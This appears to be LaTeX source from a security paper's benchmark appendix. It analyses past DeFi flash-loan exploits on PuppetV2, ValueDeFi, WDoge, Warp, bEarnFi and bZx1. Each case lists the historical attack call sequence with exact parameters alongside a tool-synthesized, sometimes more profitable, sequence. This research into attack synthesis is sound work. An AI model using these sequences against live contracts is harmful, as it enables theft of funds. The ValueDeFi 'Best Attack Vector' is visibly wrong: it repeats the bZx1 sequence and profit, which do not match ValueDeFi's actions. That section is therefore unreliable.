Action 1: \codeword{swapExactTokensForETH(10000e18)}
\\ 
Action 2: \codeword{deposit(29e18)}
\\
Action 3: \codeword{borrow(1000000e18)}
\\
The exploiter first converts all its DVT(10000 DVT) to ETH, making the uniswap v2 pair has 10100 DVT and less than 1 ETH(Action 1). Then the exploiter wraps 29 ETH(Action 2) to prepare for borrowing all of DVT in the lending pool(Action 3). If we assume 1 ETH = 1 WETH = 1000 DVT, then the adjusted profit is 1000000 DVT.







\noindent \textbf{Best Attack Vector from {\name}:}
\\
Action 1: \codeword{swapExactTokensForETH(9999e18)}
\\ 
Action 2: \codeword{deposit(28e18)}
\\
Action 3: \codeword{borrow(9908470e18)}
\\
Our synthesized attack vector is very similar to the community's one. And they behave the same way. The adjusted profit of our synthesized attack vector is 854058 DVT.


\noindent \textbf{Data Points Statistics:}


\begin{table}[H]
    \caption{PuppetV2 State Reading Functions}
    \begin{tabular}{|l|l|l|}
    \hline
    Protocol & State Reading Function & Note \\ \hline
    Uniswap & uniswapV2Pair.getReserves(){[}0{]} & Uniswap DVT liquidity \\ \hline
    Uniswap & uniswapV2Pair.getReserves(){[}1{]} & Uniswap WETH liquidity \\ \hline
    PuppetV2 & dvt.balanceOf(address(puppetV2Pool)) & PuppetV2 Pool DVT reserve \\ \hline
    \end{tabular}
    \end{table}




\begin{table}[H]
\caption{Number of Data Points for PuppetV2 Actions}
\begin{tabular}{|l|l|l|l|}
\hline
Action & Initial Round & End(Polynomial) & End(Interpolation) \\ \hline
swapExactTokensForETH(-) & 667 & 704 & 730 \\ \hline
deposit(-) & / & / & / \\ \hline
borrow(-) & 63 & 147 & 138 \\ \hline
\end{tabular}
\end{table}
    


==> tex/benchmarks/ValueDeFi.tex <==
\subsubsection{ValueDeFi[\href{https://etherscan.io/tx/0x46a03488247425f845e444b9c10b52ba3c14927c687d38287c0faddc7471150a}{Transaction}] [\href{https://peckshield.medium.com/value-defi-incident-root-cause-analysis-fbab71faf373}{Post Mortem}]}

On Nov. 14, 2020, Value DeFi was exploited and about \$7.4 million of DAI was drained from the contracts. The hacker further leaves a message to challenge the team, who declared anti-flashloan protection mechanism some days earlier. 



\begin{table}[H]
\caption{Key Actions of ValueDeFi Attack}
\begin{tabular}{|l|l|l|l|}
\hline
Protocol & Function & Token In & Token Out \\ \hline
ValueDeFi & deposit & DAI & mvUSD \\ \hline
Curve Finance & exchange & DAI & USDC \\ \hline
Curve Finance & exchange & USDT & USDC \\ \hline
ValueDeFi & withdrawFor & mvUSD & CRV \\ \hline
Curve Finance & exchange & USDC & DAI \\ \hline
Curve Finance & exchange & USDC & USDT \\ \hline
\end{tabular}
\end{table}



\noindent \textbf{Attack Root Cause:}
The root cause of this attack is the protocol uses the AMM based oracle, Curve, to measure the asset price, which can be manipulated easily within a block with the help of flash loan.  


\noindent \textbf{Real Attack Vector in History:}
\\
Action 1: \codeword{deposit(25000000e18)} 
\\ 
Action 2: \codeword{exchangeDAI2USDC(91000000e18)} 
\\ 
Action 3: \codeword{exchangeUSDT2USDC(31000000e6)} 
\\ 
Action 4: \codeword{withdrawFor(24923203e8)} 
\\ 
Action 5: \codeword{exchangeUSDC2DAI(17331353e6)} 
\\ 
Action 6: \codeword{exchangeUSDC2USDT(90285002e6)} 
\\ 
Adjusted profit: 7956221.0

First the exploiter borrowed 116M DAI and 31M USDT, then deposited 25M DAI to ValueDeFi Vault contract. Next the exploiter started to manipulate the prices, swap DAI, USDT to USDC(Action 2 and Action 3). Under the manipulated prices, the exploiter burnt the minted pool tokens to redeem the unproportional CRV tokens. And finally swap USDC back to USDT and DAI(Action 5 and Action 6).  


\noindent \textbf{Best Attack Vector from {\name}:}
\\
Action 1: \codeword{mintWithEther(value: 1299 ether)(address(this), 0)} 
\\ 
Action 2: \codeword{tokenToETHwapInput(48 * 1e8, 1, 0xffffffff)} 
\\
Adjusted profit: 2319 

\noindent \textbf{Datapoints Statistics:}


\begin{table}[H]
\caption{ValueDeFi State Reading Functions}
\begin{tabular}{|l|l|l|}
\hline
Protocol & State Reading Function & Note \\ \hline
Curve Finance & balances(0) & CurvePool DAI liquidity \\ \hline
Curve Finance & balances(1) & CurvePool USDC liquidity \\ \hline
Curve Finance & balances(2) & CurvePool USDT liquidity \\ \hline
ValueDeFi & totalSupply() & mvUSD total Suuply \\ \hline
ValueDeFi & balance() & mvUSD CRV reserve \\ \hline
\end{tabular}
\end{table}



\begin{table}[H]
\caption{Number of Data Points for ValueDeFi Actions}
\begin{tabular}{|l|l|l|l|}
\hline
Function & Start & End(Polynomial) & End(Interpolation) \\ \hline
deposit & 14382 & 14845 & 14580 \\ \hline
exchangeDAI2USDC & 5925 & 5925 & 6034 \\ \hline
exchangeUSDT2USDC & 5239 & 5239 & 5498 \\ \hline
withdrawFor & 810 & 1100 & 853 \\ \hline
exchangeUSDC2DAI & 6365 & 6365 & 6365 \\ \hline
exchangeUSDC2USDT & 5342 & 5342 & 5342 \\ \hline
\end{tabular}
\end{table}

==> tex/benchmarks/WDoge.tex <==
\subsubsection{WDoge[\href{https://bscscan.com/tx/0x4f2005e3815c15d1a9abd8588dd1464769a00414a6b7adcbfd75a5331d378e1d}{Transaction}] [\href{https://coinyuppie.com/four-combinations-of-hackers-analysis-of-attacks-on-wiener-doge-last-kilometer-medamon-and-pidao-projects/}{Post Mortem}]}


On April 24, 2022,  the Wiener DOGE project on Binance Smart Chain experienced a flash loan attack that resulted in a loss of US\$30,000.  

\begin{table}[H]
\caption{Key Actions of WDoge Attack}
\begin{tabular}{|l|l|l|l|}
\hline
Protocol & Function & Token In & Token Out \\ \hline
Pancake & swap & WBNB & Wdoge \\ \hline
Pancake & swap & Wdoge & WBNB \\ \hline
Wdoge & transfer(address(WdogeWBNBpair), -) & Wdoge & / \\ \hline
Pancake & skim(address(this)) & / & Wdoge \\ \hline
Pancake & sync() & / & / \\ \hline
\end{tabular}
\end{table}


\noindent \textbf{Attack Root Cause:}
The root cause of the incident is due to the inconsistency between Wiener DOGE contract's charging mechanism and the Uniswap pool. Wdoge tokens are deflationary tokens. Suppose A transfers $x$ Wdoge tokens to B, A lost $x$ + $0.04x$ Wdoge, while B received $0.9x$, and $0.1x$ will be redistributed among developers, fee wallet and other holders. However, if the uniswap pair's Wdoge reserve is less than Wdoge balance, the attacker can call \codeword{skim} to force the pair to send extra Wdoge to another address, and drain Wdoge reserve due to Wdoge's special burn mechanism.


\noindent \textbf{Real Attack Vector in History:}
\\
Action 1: \codeword{swapWBNB2Wdoge(2900e18)} 
\\ 
Action 2: \codeword{transfer(address(WdogeWBNBpair), 5224718e24)} 
\\
Action 3: \codeword{skim(address(this))}
\\
Action 4: \codeword{sync()}
\\
Action 5: \codeword{SwapWdoge2WBNB(4466647e24)} 
\\
Adjusted profit: 78





\noindent \textbf{Best Attack Vector from {\name}:}
\\
Action 1: \codeword{swapWBNB2Wdoge(2859e18)} 
\\ 
Action 2: \codeword{transfer(address(WdogeWBNBpair), 5156250e24)} 
\\
Action 3: \codeword{skim(address(this))}
\\
Action 4: \codeword{sync()}
\\
Action 5: \codeword{SwapWdoge2WBNB(4609375e24)} 
\\
Adjusted profit: 75



\noindent \textbf{Datapoints Statistics:}
\begin{table}[H]
\caption{WDoge State Reading Functions}
\begin{tabular}{|l|l|l|}
\hline
Protocol & State Reading Function & Note \\ \hline
Pancake & WdogeWBNBpair.getReserves(){[}0{]} & PancakeSwap Pair's Wdoge Reserve \\ \hline
Pancake & WdogeWBNBpair.getReserves(){[}1{]} & PancakeSwap Pair's WBNB Reserve \\ \hline
Pancake & Wdoge.balanceOf(address(WdogeWBNBpair)) & PancakeSwap Pair's Wdoge Balance \\ \hline
Pancake & WBNB.balanceOf(address(WdogeWBNBpair)) & PancakeSwap Pair's WBNB Balance \\ \hline
\end{tabular}
\end{table}



\begin{table}[H]
\caption{Number of Data Points for WDoge Actions}
\begin{tabular}{|l|l|l|l|}
\hline
Function & Start & End(Polynomial) & End(Interpolation) \\ \hline
skim & 8100 & 8101 & 8226 \\ \hline
\end{tabular}
\end{table}


==> tex/benchmarks/Warp.tex <==
\subsubsection{Warp[\href{https://etherscan.io/tx/0x8bb8dc5c7c830bac85fa48acad2505e9300a91c3ff239c9517d0cae33b595090}{Transaction}] [\href{https://slowmist.medium.com/analysis-of-warp-finance-hacked-incident-cb12a1af74cc}{Post Mortem}]}
\label{sec:Warp}

On Dec. 18, 2020, Warp Finance suffered a flash loan attack which leads to about \$7.8 million loss, according to \href{https://rekt.news/warp-finance-rekt/}{Rekt News}. 


\begin{table}[H]
\caption{Key Actions of Warp Attack}
\begin{tabular}{|l|l|l|l|}
\hline
Protocol & Function & Token In & Token Out \\ \hline
uniswap & mint & WETH, DAI & LP \\ \hline
uniswap & swap & WETH & DAI \\ \hline
warp & provideCollateral(-) & LP & BL \\ \hline
warp & borrowSC(address(USDC), -) & BL & USDC \\ \hline
warp & borrowSC(address(DAI), -) & BL & DAI \\ \hline
uniswap & swap & DAI & WETH \\ \hline
\end{tabular}
\end{table}



\noindent \textbf{Attack Root Cause:}
The core of Warp attack is a design flaw of calculating the price of LP tokens. The price of LP token is calculated as (amount(WETH) in the pool * WETH price + amount(DAI) in the pool * DAI price) / total supply of LP. Even though the developer uses Uniswap official price oracle to (correctly) calculate the prices of WETH and DAI, they failed to realize the amounts of WETH and DAI can also be manipulated by flash loans. The exploiter took advantage of this point, pumped up the LP price, and falsely borrow excessive USDC and DAI from the pool.


\noindent \textbf{Real Attack Vector in History:}
\\
Action 1: \codeword{mint(2900030e18)} 
\\ 
Action 2: \codeword{swapWETH2DAI(341217e18)} 
\\ 
Action 3: \codeword{provideCollateral(94349e18)} 
\\ 
Action 4: \codeword{borrowSC(address(USDC), 3917983e16)} 
\\
Action 5: \codeword{borrowSC(address(DAI), 3862646e16)} 
\\
Action 6: \codeword{swapDAI2WETH(47622329e18)} 
\\ 
Adjusted profit: ~1,693,523 USD (DAI + USDC + WETH)


First the exploiter flash loans WETH and DAI and \codeword{mint} liquidity to Uniswap's WETH-DAI pair. Then the attacker swaps a huge amount of WETH into DAI in Uniswap to increase the total value of the WETH-DAI pool, pumping up the unit price of LP token. The exploiter then mortgages the previously obtained LP Token through the \codeword{provideCollateral} function. As the unit price of LP Token becomes higher, the LP Token mortgaged by the attacker can lend more stable coins to make profits.


\noindent \textbf{Best Attack Vector from {\name}:}
\\
Action 1: \codeword{swapWETH2DAI(479381e18)} 
\\
Action 2: \codeword{mint(316661e18)} 
\\
Action 3: \codeword{provideCollateral(64243e18)} 
\\ 
Action 4: \codeword{borrowSC(address(USDC), 3847320e16)} 
\\
Action 5: \codeword{borrowSC(address(DAI), 3573555e16)} 
\\
Action 6: \codeword{swapDAI2WETH(56946702e18)} 
\\ 
Adjusted profit: ~2,773,345 USD (DAI + USDC + WETH)


It is quite surprising that the attack vector from {\name} gets a higher profit compared to the attacker in history. The reason behind this is the attack vector given by {\name} spends more on manipulating Uniswap pair and spends less on the LP Token mortgaged. In this attack, to get the same lending allowance, it is more economical to manipulate the Uniswap pair than collateralize more LP tokens. 


\noindent \textbf{Datapoints Statistics:}

\begin{table}[H]
\caption{Warp State Reading Functions}
\begin{tabular}{|l|l|l|}
\hline
Protocol & State Reading Function & Note \\ \hline
uniswap & getReserves(){[}0{]} & Uniswap's DAI liquidity \\ \hline
uniswap & getReserves(){[}1{]} & Uniswap's WETH liquidity \\ \hline
\end{tabular}
\end{table}



\begin{table}[H]
\caption{Number of Data Points for Warp Actions}
\begin{tabular}{|l|l|l|l|}
\hline
Function & Start & End(Polynomial) & End(Interpolation) \\ \hline
mint & 6718 & 6718 & 6720 \\ \hline
provideCollateral(-) & 968 & 968 & 971 \\ \hline
borrowSC(address(USDC), -) & 19 & 19 & 19 \\ \hline
borrowSC(address(DAI), -) & 17 & 17 & 18 \\ \hline
\end{tabular}
\end{table}

==> tex/benchmarks/WarpCaseStudy.tex <==
\label{subsec:Warp}



On Dec. 18, 2020, Warp Finance suffered a flash loan attack which leads to about \$7.8 million loss, 
according to Rekt~\cite{Rekt}. The first attack happened in 
the transaction~\cite{Warp}. 
A detailed postmortem analysis~\cite{WarpFiAnalysis} is written by SlowMist on Medium. 


\noindent \textbf{Attack Root Cause:}
The core of Warp attack is a design flaw of calculating 
the price of LP tokens. The price of LP token is calculated as (amount(WETH) in the pool * WETH price + amount(DAI) in the pool * DAI price) / total supply of LP. Even though the developer uses Uniswap official price oracle to (correctly) calculate the prices of WETH and DAI, they failed to realize the amounts of WETH and DAI can also be manipulated by flash loans. The exploiter took advantage of this point, pumped up the LP price, and falsely borrow excessive USDC and DAI from the pool.


\noindent \textbf{Real Attack Vector in History:}
\\
Action 1: \codeword{mint(2900030e18)} 
\\ 
Action 2: \codeword{swap(WETH, DAI, 341217e18)} 
\\ 
Action 3: \codeword{provideCollateral(94349e18)} 
\\ 
Action 4: \codeword{borrowSC(USDC, 3917983e6)} 
\\
Action 5: \codeword{borrowSC(DAI, 3862646e18)} 
\\
Action 6: \codeword{swap(DAI, WETH, 47622329e18)} 
\\ 
Adjusted profit: ~1,693,523 USD (DAI + USDC + WETH)


First the exploiter flash loaned WETH and DAI and \codeword{mint} 2900030 DAI and equivalent WETH to Uniswap's WETH-DAI pair. Then the attacker swapped a huge amount of WETH into DAI via the pair to increase the total value of the WETH-DAI pool, pumping up the unit price of LP token. The exploiter then mortgages the previously obtained LP Token through the \codeword{provideCollateral} function. As the unit price of LP Token becomes higher, the LP tokens mortgaged by the attacker give an abnormally high borrow limit thus the attacker can borrow more make profit.


\noindent \textbf{Best Attack Vector from {\name}:}
\\
Action 1: \codeword{swap(WETH, DAI, 480069e18)} 
\\
Action 2: \codeword{mint(322007e18)} 
\\
Action 3: \codeword{provideCollateral(65937e18)} 
\\ 
Action 4: \codeword{borrowSC(USDC, 3862530e6)} 
\\
Action 5: \codeword{borrowSC(DAI, 3917914e18)} 
\\
Action 6: \codeword{swap(DAI, WETH, 48862671e18)} 
\\ 
Adjusted profit: ~3,368,718 USD (DAI + USDC + WETH)


It is quite surprising that the attack vector from {\name} gets a higher profit compared to the attacker in history. The reason behind this is the attack vector given by {\name} spends more on manipulating Uniswap pair(Action 1 and Action 6) and spends less on the LP Token mortgaged(Action 2 and Action 3). In this attack, to get the same borrow limit(which can be used to borrow USDC and DAI in Action 4 and Action 5), it is more economical to spend on manipulating the Uniswap pair than collateralizing more LP tokens. 




==> tex/benchmarks/bEarnFi.tex <==
\subsubsection{bEarnFi[\href{https://bscscan.com/tx/0x603b2bbe2a7d0877b22531735ff686a7caad866f6c0435c37b7b49e4bfd9a36c}{Transaction}][\href{https://peckshield.medium.com/bearn-fi-incident-inconsistent-asset-denomination-between-vault-strategy-9b24b68ab1c0}{Post Mortem}]}

On May 16th 2021, BvaultsBank contract of bEarn.Fi protocol was exploited and about \$11M funds were drained from the pool. The exploiter got its initial balances via recursive flash loans from eight different fund pools.  



\begin{table}[H]
\caption{Key Actions of bEarnFi Attack}
\begin{tabular}{|l|l|l|l|}
\hline
Protocol & Function & Token In & Token Out \\ \hline
bEarn.Fi & deposit(13, -) & BUSD & / \\ \hline
bEarn.Fi & emergencyWithdraw(13) & / & BUSD \\ \hline
\end{tabular}
\end{table}



\noindent \textbf{Attack Root Cause:}
When users interact with bEarnFi's \textbf{Bvaultsbank} contract to deposit and withdraw funds, meanwhile, \textbf{Bvaultsbank} contract interacts with the associated strategy \textbf{BvaultsStrategy} contract to deposit and withdraw funds. However, there is a difference between withdraw logic of Bvaultsbank and that of BvaultsStrategy. They use the same parameter but different asset denomination. When a user sends a withdrawal request of 100 BUSD, \textbf{Bvaultsbank} will withdraw 100 ibBUSD from \textbf{BvaultsStrategy}. Note 1 ibBUSD is an interest bearing asset and more expensive than 1 BUSD. The difference is treated as a profit and will be credited to the exploiter when it withdraws the funds next time.


\noindent \textbf{Real Attack Vector in History:}
\\
Action 1: \codeword{deposit(13, 7800000e18) }
\\ 
Action 2: \codeword{emergencyWithdraw(13) }
\\
Action 3: \codeword{deposit(13, 7800000e18) }
\\ 
Action 4: \codeword{emergencyWithdraw(13) }
\\
The exploiter first deposits 7804k BUSD into \textbf{Bvaultsbank} contract, which are immediately sent to \textbf{BvaultsStrategy} contract(Action 1). Then it called \codeword{emergencyWithdraw(13) } to directly withdraw its funds, which turns to be interpreted as withdrawing 7804k ibBUSD($\approx 7818$k BUSD). Note the exploiter only gets back 7804k BUSD in Action 2, the leftover is stored in \textbf{BvaultsStrategy}. In the next round, the exploiter does the same thing again, but this time, with leftover from last time,  \textbf{BvaultsStrategy} credits the exploiter with $\approx 7818$k BUSD. The adjusted profit is about 14k BUSD.





\noindent \textbf{Best Attack Vector from {name}:}
\\
Action 1: \codeword{deposit(13, 7799710e18) }
\\ 
Action 2: \codeword{emergencyWithdraw(13) }
\\
Action 3: \codeword{deposit(13, 7003934e18) }
\\ 
Action 4: \codeword{emergencyWithdraw(13) }
\\
{\name}'s synthesized result is very close to the real attack sequence in history. It deposits a slightly smaller amount in Action 3, which reduces the profit a little bit. The adjusted profit for the above attack vector is 12495 BUSD. 
\noindent \textbf{Data Points Statistics:}


\begin{table}[H]
\caption{State Reading Functions}
\begin{tabular}{|l|l|l|}
\hline
Protocol & State Reading Function & Note \\ \hline
bEarn.Fi & BvaultsStrategy.sharesTotal() & Total number of shares of BVault \\ \hline
bEarn.Fi & BvaultsStrategy.wantLockedTotal() & Locked values of BVault \\ \hline
bEarn.Fi & Bvaultsbank.userInfo(13, address(this)) & Number of the user's share of BVault \\ \hline
BUSD & BUSD.balanceOf(BvaultsStrategyAddress) & BvaultStrategy's BUSD balance \\ \hline
\end{tabular}
\end{table}





\begin{table}[H]
\caption{Number of Data Points for bEarnFi Actions}
\begin{tabular}{|l|l|l|l|}
\hline
Action & Start & End(Polynomial) & End(Interpolation) \\ \hline
deposit(13, -) & 4988 & 4992 & 5082 \\ \hline
emergencyWithdraw(13) & 4007 & 4011 & 4101 \\ \hline
\end{tabular}
\end{table}


==> tex/benchmarks/bZx1.tex <==
\subsubsection{bZx1[\href{https://etherscan.io/tx/0xb5c8bd9430b6cc87a0e2fe110ece6bf527fa4f170a4bc8cd032f768fc5219838}{Transaction}] [\href{https://www.palkeo.com/en/projets/ethereum/bzx.html}{Post Mortem}]}

On Feb. 15th, 2020, a flash loan transaction hit bZx protocol, triggering a logic bug inside bZx protocol and yields a profit of 1193.69 ETH (350k USD), which has been well studied by other researchers~\cite{qin2021attacking, cao2021flashot}. If the steps needed to get initial balances and return the flashloan are ignored, we identify two actions which fully reveal the vulnerabilities and form the attack sequence. 



\begin{table}[H]
\caption{Key Actions of bZx1 Attack}
\begin{tabular}{|l|l|l|l|}
\hline
Protocol & Function & Token In & Token Out \\ \hline
bZx & mintWithEther(value: -)(address(this), 0) & ETH & / \\ \hline
uniswapV1 & tokenToEthSwapInput(-, 1, 0xffffffff) & WBTC & ETH \\ \hline
\end{tabular}
\end{table}



\noindent \textbf{Attack Root Cause:}
The core of bZx1 attack is a logic bug inside the \codeword{mintWithEther}. When \codeword{mintWithEther} is called with $n$ ETH, it will automatically short sell $m \approx 4.33n$ ETH against WBTC through Uniswap V1. In other words, the exploiter spent fewer ETH but opened an unreasonably larger short position, which offered arbitrage opportunities. This was caused by the bug which skipped the sanity check, reported by peckshield\footnote{\url{https://peckshield.medium.com/bzx-hack-full-disclosure-with-detailed-profit-analysis-e6b1fa9b18fc}}.  

\noindent \textbf{Real Attack Vector in History:}
\\
Action 1: \codeword{mintWithEther(value: 1300 ether)(address(this), 0)} 
\\ 
Action 2: \codeword{tokenToETHwapInput(112 * 1e8, 1, 0xffffffff)} 
\\
Adjusted profit: 1194

First the exploiter called \codeword{mintWithEther} with 1300 ETH, which triggers bZx protocol to swap 5637.62 ETH on Uniswap V1 for only 51.35 WBTC (at 109.79 ETH/WBTC). Then the exploiter converted its 112 WBTC into 6871.41 ETH (at 61.35 ETH/WBTC), a price substantially lower than market price. Overall, the adjusted profit is $(6871.41 - 1300) \cdot 1.0 - 112 \cdot 39.08 \approx 1194$



\noindent \textbf{Best Attack Vector from {\name}:}
\\
Action 1: \codeword{mintWithEther(value: 1299 ether)(address(this), 0)} 
\\ 
Action 2: \codeword{tokenToETHwapInput(48 * 1e8, 1, 0xffffffff)} 
\\
Adjusted profit: 2319 

\noindent \textbf{Datapoints Statistics:}


\begin{table}[H]
\caption{bZx1 State Reading Functions}
\begin{tabular}{|l|l|l|}
\hline
Protocol & State Reading Function & Note \\ \hline
uniswapV1 & WBTC.balanceOf(UniswapWBTCAddress) & Uniswap's WBTC liquidity \\ \hline
uniswapV1 & UniswapWBTCAddress.balance & Uniswap's ETH liquidity \\ \hline
\end{tabular}
\end{table}






\begin{table}[H]
\caption{Number of Data Points for bZx1 Actions}
\begin{tabular}{|l|l|l|l|}
\hline
Function & Start & End(Polynomial) & End(Interpolation) \\ \hline
mintWithEther & 2045 & 2075 & 2167 \\ \hline
tokenToEthSwapInput & 561 & 584 & 627 \\ \hline
\end{tabular}
\end{table}

